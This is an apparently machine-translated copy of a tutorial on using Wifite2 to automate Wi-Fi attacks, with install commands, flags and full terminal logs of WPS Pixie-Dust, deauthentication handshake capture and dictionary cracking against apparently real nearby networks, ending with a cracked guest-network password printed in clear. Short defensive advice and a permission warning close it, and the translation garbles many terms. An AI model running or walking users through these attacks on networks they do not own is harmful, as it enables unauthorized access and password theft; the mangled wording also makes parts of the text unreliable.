قالب وردپرس درنا توس
Home / Tips and Tricks / Automating Wi-Fi Hacking with Wifite2 «Null Byte :: WonderHowTo

Automating Wi-Fi Hacking with Wifite2 «Null Byte :: WonderHowTo



There are many ways to attack a Wi-Fi network. The type of encryption, the manufacturer settings and the number of connected clients determine how easily a target can attack and which method is best. Wifite2 is a powerful tool that automates the hacking of Wi-Fi so you can select targets within range and let the script choose the best strategy for each network.

Wifite2 vs. Wifite

Wifite has been using one of the first Wi-Fi hacking tools introduced to me for some time. In addition to Besside-ng, automated Wi-Fi hacking scripts allowed even scripted kiddies to have a significant effect without knowing much about how the script works. Compared to Besside-ng, the original Wifite has used all available tools to attack a network very thoroughly, but it could also be very slow.

One of the best features of the original Wifite was the fact that it performed a Wi-Performance Site Survey before attacking nearby networks, allowing a hacker to pinpoint one, some or all of its nearby networks Set goals. By creating available targets in an easy-to-understand format, even a novice can understand which attacks might work best near networks.

The original Wifite system would automatically attack WPA networks by attempting to capture a handshake or use the Reaver tool Put the WPS setup PIN into place near networks. While this method was effective, it could take up to eight hours or more.

The updated version of WiFite2 is much faster, breaks down attacks in less time, and uses more refined tactics than its predecessor. Because of this, Wifite2 is a more serious and powerful Wi-Fi hacking tool than the original Wifite.

Attack Flow for Wi-Fi Hacking

Wifite2 follows a simple but effective workflow to hack nearby networks as quickly as possible. To do this, any tactic it tries will be brought to the practical limit, even to the point of attempting to crack the handshakes it queries.

In the first step, Wifite2 searches all channels and looks for a network within reach. It maps these networks according to signal strength, because a detected network does not ensure that you can reliably communicate with it.

The Signaling Phase includes the signaling of the strongest to weakest signal strength. It collects information about which networks are involved and which hacks are being used techniques they are vulnerable to. Because of the way Wifite2 is organized, it's easy to add a directional Wi-Fi antenna to use Wifite2 to discover the source of a nearby Wi-Fi network while a site survey is taking place ,

After Site Surveillance Completed All displayed destinations indicate whether clients are connected, whether the network is announcing WPS, and what type of encryption the network is using. Based on this, an attacker can select any target, group of targets, or all targets to launch an attack based on the collected information.

Wifite2 goes through the target list, starting with the quickest and simplest attacks, such as WPS pixie. This can cause a password to be breached in seconds, leading to less secure tactics such as checking for weak passwords in a dictionary attack. If an attack fails or takes too long, Wifite2 switches to the next applicable attack without wasting hours as its predecessor was prone to.

What you need

To get started, you need a Wi-Fi network adapter that lets you put in wireless surveillance mode. This means that you need to choose one that is compatible with Kali Linux, for which we have several excellent guides available.

Wifite2 is installed under Kali Linux by default. I recommend that you either use Kali in a virtual machine or use a dual-boot computer on a laptop. You can use Wifite2 on other Linux systems, but I will not go through the installation because this guide assumes that you are using Kali Linux.

Recommended Adapter: Alfa AWUS036NHA

Step 1: Install Wifite2 [19659003] If you have not already installed Wifite2 on your system, you can do so from the GitHub repository. First, you can clone the repository by opening a terminal window and entering the following commands:

  git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install 

This should download Wifite2 and install it on your system. To test if it worked, you can enter wifite -h to view information about the installed version.

  wifite -h

, ,
.'·. , · `. white 2.1.6
::: (¯) ::: automated wireless auditor
`. · `/ ¯  '· .'https://github.com/derv82/wifite2
`/ ¯¯  '

optional arguments:
-h, --help View and exit this help message

THE SETTINGS:
-v, --verbose Displays additional options (-h -v). Prints commands and outputs. (Default: quiet)
-i [interface] Wireless interface to use (default: select first or ask)
-c [channel] Wireless channel to scan (default: all channels)
-mac, --random-mac Randomly determine the MAC address of the WLAN card (Default: Off)
-p [scantime] Plunder: Attack all targets in seconds
--kill kill processes that conflict with Airmon / Airodump (default: off)
--clients-only, -co Displays only targets that have clients associated with them (default: off).
--nauteauths passive mode: never authenticates clients (default: deauth targets)

WEP:
--wep filters to show only WEP encrypted networks (default: off)
--require-fakeauth Fails if fake-auth fails (default: off)
--keep-ivs Maintain .ivs files and reuse when cracking (disabled by default)

WPA:
--wpa filter to display only WPA encrypted networks (including WPS)
--new-hs Captures new handshakes and ignores existing handshakes in ./hs (Default: Off)
--dict [file] File with passwords to crack (default: /usr/share/wordlists/fern-wifi/common.txt)

WPS:
--wps Filter to show only WPS enabled networks
--bully Use Bully instead of Reaver for WPS attacks (default: Reaver)
--no-wps NEVER use WPS (Pixie-Dust) attacks on non-WEP networks (Default: Off)
--wps-only ALWAYS use Pixie Dust (WPS) attacks on non-WEP networks (default: Off).

EVIL TWIN:
-ev, --eviltwin Use the Bad Twin attack against all targets (Default: Off)

COMMANDS:
--cracked Displays previously cracked access points
--check [file] Check a .cap file (or all hs / *. cap files) for WPA handshakes
--crack Show commands to crack a detected handshake 

Step 2: Insert your Wi-Fi card

If Wifite2 is installed on your system, you need to connect your Kali Linux-compatible Wi-Fi network Adapter. Not only does Wifite2 automatically select a wireless network adapter, it also provides the monitor mode of the wireless card, so you do not have to do anything after connecting the adapter.

Step 3: Set Flags & Find a Target

If we know which channel we are attacking, you can select it by adding the command -c followed by the channel number. Besides, it is easy to run Wifite2 as wifite and to have the script collect information.

  wifite -c 11

, ,
.'·. , · `. white 2.1.6
::: (¯) ::: automated wireless auditor
`. · `/ ¯  '· .'https://github.com/derv82/wifite2
`/ ¯¯  '

[+] Option: Scan for targets on channel 11
[!] Conflict between process: NetworkManager (PID 464)
[!] Conflict Process: wpa_supplicant (PID 729)
[!] Conflict Process: Dhclient (PID 13595)
[!] if you have problems: kill -9 PID or wifite with --kill again

[+] is looking for wireless interfaces

Interface PHY Driver Chipset
-------------------------------------------------- ---------------------
1. wlan0 phy3 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

[+] Enabling monitor mode on wlan0 ... enables wlan0mon

NUM ESSID ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 suicide 11 WPA 48db no
2 Bourgeois Pig Guest 11 WPA 45db no
3 BPnet 11 WPA 42db no
4 DirtyLittleBirdyFeet 11 WPA 32db no 5
5 ATT73qDwuI 11 WPA 32db yes
6 SpanishWiFi 11 WPA 24db no
7 Franklin Lower 11 WPA 20db # 3
8 Sonos 11 WPA 11db no
9 Villa Carlotta 11 WPA 11db nr
10 Sonos 11 WPA 10db no
[+] Select target (s) (1-10) separated by commas, hyphens, or all: 

Here we performed a scan on channel 11 and found 10 different targets. Of these targets, two are connected to clients, one has WPS enabled, and all use WPA security.

Step 4: Check site investigation and select targets

From our test survey we can see the target number 5 present the best target. Although signal strength is not the best and there are no clients, we can probably get a handshake with the new PMKID attack even when no one is connected.

When we're weak passwords, the first three networks have the strongest signal strength, while goals 4 and 7 have the best chance of getting a quick four-way handshake to later try brute-forcing. If we focus on a particular network, we can choose it now. If we want to select the most likely networks, we can select targets 4, 5, and 7 so that a quick handshake can be detected and cracked if the WPS PIN is not cracked first.

If we want to focus For simple targets, we can tell the script to only show targets that are vulnerable to a particular type of attack. To show only targets with WPS susceptible to Reaver or Bully attacks, we can run Wifite2 with the -wps flag.

  Wifite -wps

, ,
.'·. , · `. white 2.1.6
::: (¯) ::: automated wireless auditor
`. · `/ ¯  '· .'https://github.com/derv82/wifite2
`/ ¯¯  '

[+] Option: Targeting to WPS-encrypted networks
[!] Conflict between process: NetworkManager (PID 464)
[!] Conflict Process: wpa_supplicant (PID 729)
[!] Conflict Process: Dhclient (PID 14824)
[!] if you have problems: kill -9 PID or wifite with --kill again

[+] is looking for wireless interfaces

Interface PHY Driver Chipset
-------------------------------------------------- ---------------------
1. wlan0 phy4 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

[+] Enabling monitor mode on wlan0 ... enables wlan0mon

NUM ESSID ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 SBG6580E8 1 WPA 45db yes
2 The Daily Planet 1 WPA 30db yes 1
3 ATT73qDwuI 11 WPA 28db yes
4 Birds Wireless 2 WPA 23db yes
[+] Select target (s) (1-4) separated by commas, hyphens or all: 

We can do the same with -wpa or -wep to only to show goals that match these types of encryption.

Step 5: Automating Attacks by Destination Type

Let's pick a destination from our list of results that includes both WPS-enabled and connected clients. After selecting the number of the network we want to attack, Wifite2 will perform the most appropriate attacks on the network.

  [+] (1/1) Attacks against 69: 96: 43: 69: D6: 96 (The Daily Planet)
[+] The Daily Planet (76 dB) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52dB) WPA Handshake Capture: New Customer Discovers: C8: E0: EB: 45: CD: 45
[+] The Daily Planet (35 dB) WPA Handshake Capture: Listening. (Customers: 1, Deauth: 11s, Timeout: 7m59s)

[+] successful handshake recorded
[+] Saving a copy of the handshake saved in hs / handshake_TheDailyPlanet_69: 96: 43: 69: D6: 96_2018-12-24T00-33-18.cap

[+] Analysis of the captured handshake file:
[+] tshark: The .cap file contains a valid handshake for 69: 96: 43: 69: D6: 96
[!] pyrite: The .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: The .cap file contains a valid handshake for 69: 96: 43: 69: D6: 96

[+] Cracking WPA Handshake: Using aircrack-ng over the common.txt word list

[!] Handshake could not be cracked: common.txt did not contain a password
[+] Ended Attack Target of 1 Goal (s) and Leaving 

Here it can be seen that the WPS Pixie attack failed, but we could easily grab and attack a handshake. The WPS Pixie attack has passed a fairly fast time limit, so we've wasted a minimum of time exploring this attack opportunity. Sometimes different wireless cards work better with different scripts. This is the case with Reaver and Bully. If one does not work for you, try the other one.

Wifite2 uses Reaver by default, but you can change this to Bully by using the -bully flag.

  wifite-wps -bully

, ,
.'·. , · `. white 2.1.6
::: (¯) ::: automated wireless auditor
`. · `/ ¯  '· .'https://github.com/derv82/wifite2
`/ ¯¯  '

[+] Option: Use Bully instead of Reaver for WPS attacks
[+] Option: Targeting to WPS-encrypted networks
[!] Conflict between process: NetworkManager (PID 464)
[!] Conflict Process: wpa_supplicant (PID 729)
[!] Conflict Process: Dhclient (PID 14824)
[!] if you have problems: kill -9 PID or wifite with --kill again

[+] is looking for wireless interfaces
Using the wlan0mon interface (already in monitoring mode)
You can specify the wireless interface with -i wlan0

NUM ESSID ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 SBG6580E8 1 WPA 46db yes
2 The Daily Planet 1 WPA 34db yes 1
[+] Select the targets (1-2) separated by commas, hyphens, or all: 2

[+] (1/1) Attacks against 78: 96: 84: 00: B5: B0 (The Daily Planet)
[+] The Daily Planet (44 dB) WPS Pixie-Dust: [4m0s] Failed: More than 100 timeouts
[+] The Daily Planet (34db) WPA Handshake Capture: Existing handshake found for The Daily Planet
[+] Using the handshake from hs / handshake_TheDailyPlanet_78-96-84-00-B5-B0_2018-12-24T00-33-18.cap

[+] Analysis of the captured handshake file:
[+] tshark: The .cap file contains a valid handshake for 78: 96: 84: 00: b5: b0
[!] pyrite: The .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: The .cap file contains a valid handshake for 78: 96: 84: 00: B5: B0

[+] Cracking WPA Handshake: Using aircrack-ng over the common.txt word list

[!] Handshake could not be cracked: common.txt did not contain a password
[+] The attack on 1 target (s) has ended. 

Although we did not get a better result with Bully, trying to use both is a good way to find out which wireless network adapter works best.

Step 6: Skip and Check Results

If Wifite2 takes too long for a given attack, you can always skip the current attack by pressing Ctrl-C to get a menu which asks you if & # 39; I want to continue. Here you can jump to the next attack by pressing c or enter s to stop Wifite2.

  [+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] PIN 12523146 (Timeout) (Timeouts: 15)
[!] interrupted

[+] 1 attack remains, do you want to continue?
[+] Type c to continue, or s to stop: 

If you can only get a four-way handshake, we may want to add a custom dictionary list of password estimates to crack the handshake. We can do this by setting the – dict flag to set the password file for cracking. The default value is /usr/share/wordlists/fern-wifi/common.txt. This password list contains many common passwords, but you should use your own if you want to get serious results.

Below, we successfully decrypt a captured handshake using a custom dictionary "passwords.txt." [19659019] wifite -wpa –dict ./passwords.txt

, ,
.'·. , · `. white 2.1.6
::: (¯) ::: automated wireless auditor
`. · `/ ¯ '· .'https://github.com/derv82/wifite2
`/ ¯¯ '

[+] Option: Use the word list ./passwords.txt to cancel WPA handshakes
[+] Option: Targeting to WPA-encrypted networks
[!] Conflict between process: NetworkManager (PID 419)
[!] Conflict between process: wpa_supplicant (PID 585)
[!] Conflict Process: Dhclient (PID 7902)
[!] if you have problems: kill -9 PID or wifite with –kill again

[+] is looking for wireless interfaces
Using the wlan0mon interface (already in monitoring mode)
You can specify the wireless interface with -i wlan0

NUM ESSID ENCR POWER WPS? CLIENT
— ————————- — —- —– —- ——
1 suicide 11 WPA 58db n / a
2 Bourgeois Pig Guest 11 WPA 56db n / a
3 BPnet 11 WPA 56db not applicable
4 Daily Planet 1 WPA 49db not applicable 1
5 SBG6580E8 1 WPA 49db n / a
6 Hyla Hair 2.4G 8 WPA 48db Not applicable
7 TWCWiFi-Passpoint 1 WPA 46db n / a
8 HP-Print-B9-Officejet … 1 WPA 40db Not applicable
9 birds wireless 2 WPA 39db n / a
10 SpanishWiFi 11 WPA 38db Not available
[!] Airodump terminated unexpectedly (Code: 0) Command: airodump-ng wlan0mon -a -w / tmp / wifitei_l5H1 / airodump –write interval 1 – Output format pcap, csv
[+] Select target (s) (1-10) with commas, hyphens, or all separated: 2

[+] (1/1) Attacks against DE: F2: 86: EC: CA: A0 (Bourgeois Pig Guest)
[+] Bourgeois Pig Guest (57 dB) WPA Handshake Capture: New customer discovers: F0: D5: BF: BD: D5: 2B
[+] Bourgeois Pig Guest (58dB) WPA handshake capture: Discovered new customer: 6C: 8D: C1: A8: E4: E9
[+] Bourgeois Pig Guest (59db) WPA Handshake Capture: Listen. (Customers: 2, deauth: 14s, timeout: 8m1s)

[+] successful handshake recorded
[+] Back-up copy of the handshake saved in hs / handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap

[+] Analysis of the captured handshake file:
[+] tshark: The .cap file contains a valid handshake for de: f2: 86: ec: ca: a0
[!] pyrite: The .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest)
[+] aircrack: The .cap file contains a valid handshake for DE: F2: 86: EC: CA: A0

[+] Cracking WPA Handshake: Using aircrack-ng via the passwords.txt word list
[+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (Current Key: Christmasham)
[+] Cracked WPA Handshake PSK: christmasham

[+] Access point name: Bourgeois Pig Guest
[+] Access point BSSID: DE: F2: 86: EC: CA: A0
[+] Encryption: WPA
[+] Handshake File: hs / handshake_BourgeoisPigGuest_EN-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): Christmasham
[+] Crack result saved in cracked.txt (1 total)
[+] The attack on 1 target (s) has ended, and

has ended. By adding a good password file, we can improve our chances of cracking a Wi-Fi network password, even if the faster WPS attacks fail. Defense Measures

Wifite2 is an example of how even script kiddies can work against networks with common security vulnerabilities such as WPS setup PINs and weak passwords. With the increasing number of advanced attacks becoming more and more automated, it is important that you familiarize yourself with the most common and effective methods of attacking a Wi-Fi network.

In general, the best way to protect your network from tools like Wifite2 is to make sure that WPS is disabled, select a very strong password for your Wi-Fi network that you will not give to third parties that you do not need.

It is important that you select "All". In a destination list, Wifite2 attacks all discovered networks, not just the networks you have an attack on. You must have permission to use this tool on any network that you attack, since unauthorized attacking a network owned by another person is a criminal offense and can cause you great trouble. If you say the script, it's no excuse if you get caught attacking an important network. So make sure Wifite2 is targeted to networks that you have permission to use.

I hope you liked this guide to automating Wi-Fi hackers with Wifite2! If you have questions about this tutorial on Wi-Fi hacking tools or have a comment, feel free to post it in the comments or me on Twitter @KodyKinzie .

Don & # 39; t miss. Reach: Use MDK3 for Advanced Wi-Fi Jamming

Cover image of Kody / Null Byte




Source link